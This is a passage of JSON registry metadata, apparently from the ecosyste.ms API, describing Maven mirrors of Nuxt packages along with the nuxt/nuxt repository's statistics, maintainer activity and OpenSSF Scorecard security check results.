ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31168404,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-29T21:28:10.185Z","status":"ssl_error","status_checked_at":"2026-03-29T21:23:32.226Z","response_time":89,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-30T02:00:45.774Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.64704261927198,"dependent_packages_count":42.38355423497933,"stargazers_count":0.39918618392780403,"forks_count":1.2635300279329609,"docker_downloads_count":null,"average":18.423328266528017},"purl":"pkg:maven/org.mvnpm.at.nuxt/vite-builder","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:vite-builder","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:vite-builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.nuxt:vite-builder/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-28T09:00:16.075Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":701,"past_year_pull_requests_count":1163,"past_year_avg_time_to_close_issue":643507.1847826086,"past_year_avg_time_to_close_pull_request":224707.08352402746,"past_year_issues_closed_count":368,"past_year_pull_requests_closed_count":874,"past_year_pull_request_authors_count":115,"past_year_issue_authors_count":521,"past_year_avg_comments_per_issue":2.159771754636234,"past_year_avg_comments_per_pull_request":3.2768701633705932,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":467,"past_year_merged_pull_requests_count":766,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":221,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"Mini-ghost","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"BobbieGoede","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"antfu","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:vite-builder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:vite-builder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:vite-builder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:vite-builder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:vite-builder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:vite-builder/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":604801,"maintainers_count":0,"namespaces_count":79339,"keywords_count":0,"github":"maven-central","metadata":{"funded_packages_count":39644},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-04-03T06:29:38.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14148755,"name":"org.mvnpm.at.nuxt:nitro-server","ecosystem":"maven","description":"Nitro server integration for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"org.mvnpm.at.nuxt","versions_count":1,"first_release_published_at":"2026-03-30T01:36:25.000Z","latest_release_published_at":"2026-03-30T01:36:25.000Z","latest_release_number":"4.4.2","last_synced_at":"2026-05-11T01:23:07.247Z","created_at":"2026-03-30T02:00:34.302Z","updated_at":"2026-05-11T01:23:07.247Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.nuxt/nitro-server/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.nuxt/nitro-server/","metadata":{},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-03-27T22:54:07.000Z","size":135561,"stargazers_count":59951,"open_issues_count":922,"forks_count":5578,"subscribers_count":781,"default_branch":"main","last_synced_at":"2026-03-27T22:58:53.593Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-03-27T22:36:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: 